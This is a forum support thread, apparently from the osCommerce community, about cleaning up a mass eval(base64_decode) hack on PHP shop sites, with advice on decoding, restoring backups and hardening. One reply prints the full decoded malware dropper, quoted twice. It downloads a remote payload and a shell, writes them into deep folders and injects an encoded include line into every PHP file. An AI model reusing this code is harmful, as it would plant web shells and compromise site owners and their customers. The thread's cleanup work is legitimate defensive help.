125 replies to this topic

[micheleangle]

My site was hacked, too.  My hosting site ran a script to remove the long code.  Just wondering a couple dumb questions here:  1.  Does it matter if the initial coding on each file is <?php/**/?> instead of <?php/* - or exactly what should it be?  2.  There's a "sedNXuf28" type document in admin/includes.  I've never seen that before.  Should I delete it?  I have a feeling I will need to redo my entire site.  Thanks!

[emilesteenkamp]

I have been cleaning files over the weekend, found most of the encoding files, now just deleting the code on the decoding files, virtually every php file on the site, nearly 600 of them infected. I have until now deleted the code page by page, but it taking very long as you can imagine. Is there any way I can find and replace the same code on all the php files at once? I use dreamweaver.

[spooks]

emilesteenkamp, on 02 March 2010 - 03:30 PM, said:

I have been cleaning files over the weekend, found most of the encoding files, now just deleting the code on the decoding files, virtually every php file on the site, nearly 600 of them infected. I have until now deleted the code page by page, but it taking very long as you can imagine. Is there any way I can find and replace the same code on all the php files at once? I use dreamweaver.

I`m not sure dreamweaver is the best choice for editing php files.

If you follow the links in the OP including http://forums.oscommerce.com/index.php?showtopic=344272 you will find on that thread mention of a util to search all your files for the code.

[takiko]

I want to know how should I use the BASE63 encoder...
after I have encode..what should I do...
do I just paste it to my php file!?

[Whiskers]

FIMBLE, on 01 October 2009 - 10:23 AM, said:

eval(base64_decode  hack going around the internet,

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.
Some of the more common signs of this are
* Category images stop displaying
* FCK editor refuses to display images folder
* Payment modules stop working
* Checkout process stops working

How will you know?
Open any PHP file on your server, if at the very top you see a line like
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
Then you have been hacked.

To clean your site you have two options,
1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected)
And restore from a good back up. This is the best and easy route.

2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one

This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder.

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time!

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

Now your site is free on the code, you need to prevent it from happening again.

How to prevent infection.

This is not guaranteed 100% proof but it is going to help stop re-infection.

Change the name of your admin folder to something less obvious.
Delete  admin/filemanager.php and associated links.
Ensure that your folder permissions are never set higher than 755
Install some security addons,
Also some ideas from this post can help you,
If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.
There is a lot of fragmented help on the forums, I have pulled some of it together here,  read up all you can there are a lot of great people posting good information here.

I have just tried to use the Decoder that is recommended, but keep getting this error:

Invalid character in a Base-64 string

Do I need to change what I put into it?

[Whiskers]

FIMBLE, on 04 October 2009 - 08:14 PM, said:

There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery.
You really need to decode the line to find the place that the files are located in.
There can be a lot of files or one or two, and called different names.
style.css.php is one
dg.php another
there are .swf files also

With the decoder just add the code minus the <?php (' at the start and the ')?> at the end
Nic

I have a bit of confusion with how to get the decoder to work. This is the start:

<?php eval(gzinflate(base64_decode('FZnHDqvIFkU/p2+LATmpR2RMzhgmT+ScM1//

...and the end:

/8++///73fw==')));?>

When trying to take off the <?php and the ?> I keep gettig this error: Invalid length for a Base-64 char array.

[DunWeb]

Nick,

Do not include this from the beginning:

eval(gzinflate(base64_decode('

OR this at the end"

'))); ?>


so everything between the opening '  and ending ' ONLY



Chris

[Whiskers]

DunWeb, on 22 March 2010 - 05:23 PM, said:

Nick,

Do not include this from the beginning:

eval(gzinflate(base64_decode('

OR this at the end"

'))); ?>


so everything between the opening '  and ending ' ONLY



Chris

Thanks Chris. I now get this message though:

Invalid character in a Base-64 string.

[DunWeb]

Nick,

Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested.  There are others available as well.

If you want to post the encoded code I will try to decode it for you.



Chris

[MyR]

It would be a heck of a lot easier to restore a clean backup of your site than to try to clean all the files, and how would you know if you really did remove all the malicious code?

I think the only way you could not have a backup is if 1. You're hosting the site yourself, and 2. You modify files directly on the live site.  Obviously there's some problems with both of those if you don't know what you're doing.

[Whiskers]

DunWeb, on 22 March 2010 - 07:07 PM, said:

Nick,

Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested.  There are others available as well.

If you want to post the encoded code I will try to decode it for you.



Chris

Hi, it's strange because I have used it previously and got it to work, but it's wierd this time. I will PM it to you.

Thanks.

[DunWeb]

Nick,

This is the decoded file:

function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . $my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; }



Chris

[Whiskers]

DunWeb, on 23 March 2010 - 12:39 PM, said:

Nick,

This is the decoded file:

function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . $my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; }



Chris

Cheers Chris. How do I find out what file the hack is in?

[DunWeb]

Hi Nick,

I am going to guess you still have file_manager.php in your admin directory.  This is the vulnerability but the code is using 3 files:

catalog/admin/file_manager.php
catalog/admin/login.php
catalog/includes/application_top.php


I suggest you read these:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/

http://forums.oscommerce.com/index.php?showtopic=340995

Chris

[Whiskers]

DunWeb, on 23 March 2010 - 05:14 PM, said:

Hi Nick,

I am going to guess you still have file_manager.php in your admin directory.  This is the vulnerability but the code is using 3 files:

catalog/admin/file_manager.php
catalog/admin/login.php
catalog/includes/application_top.php


I suggest you read these:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/

http://forums.oscommerce.com/index.php?showtopic=340995

Chris

Hey Chris,

I have removed file manager, but I guess they must have slipped in before hand. I just started the site 3-4 days ago, so they have been quick! I noticed it because there was a thumbs.php file outside of my main files when I looked on FTP, so I removed it and checked other files, but it hasn't looked like it has spread into all my file like I have had happen before. I will check those other files though. Thanks.

[Whiskers]

Whiskers, on 23 March 2010 - 06:06 PM, said:

Hey Chris,

I have removed file manager, but I guess they must have slipped in before hand. I just started the site 3-4 days ago, so they have been quick! I noticed it because there was a thumbs.php file outside of my main files when I looked on FTP, so I removed it and checked other files, but it hasn't looked like it has spread into all my file like I have had happen before. I will check those other files though. Thanks.

I checked the login and application files, but there is no mention of hack code in those files? Should I be lookig for somethign specific?

[montana_girl]

Hi I was hacked on both of my sites.  when cleaning them up they both sent this message while file erasing was going on...
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/beachbab/public_html/catalog/index.php:2) in /home/beachbab/public_html/catalog/includes/functions/sessions.php on line 103

now my one site is clean and the message is gone, my other one i even dumped all the files and reloaded twice, comparing my last good save, but cannot find an extra file that could be causing this warning any other suggestions?

[DunWeb]

Nick,

Read this thread and apply the necessary changes to secure your admin:

http://forums.oscommerce.com/index.php?showtopic=340995


Then ready this one to secure the site:

http://forums.oscommerce.com/topic/313323-how-to-secure-your-site/



Chris

[sijo]

Whiskers, on 24 March 2010 - 07:42 AM, said:

I checked the login and application files, but there is no mention of hack code in those files? Should I be lookig for somethign specific?

Try to scan your site with this contribution..

[spooks]

montana_girl, on 26 March 2010 - 10:34 PM, said:

headers already sent by (output started at /home/beachbab/public_html/catalog/index.php:2)

looks typical of the standard whitespace issue in the file given  [img]http://forums.oscommerce.com/public/style_emoticons/default/wink.gif[/img]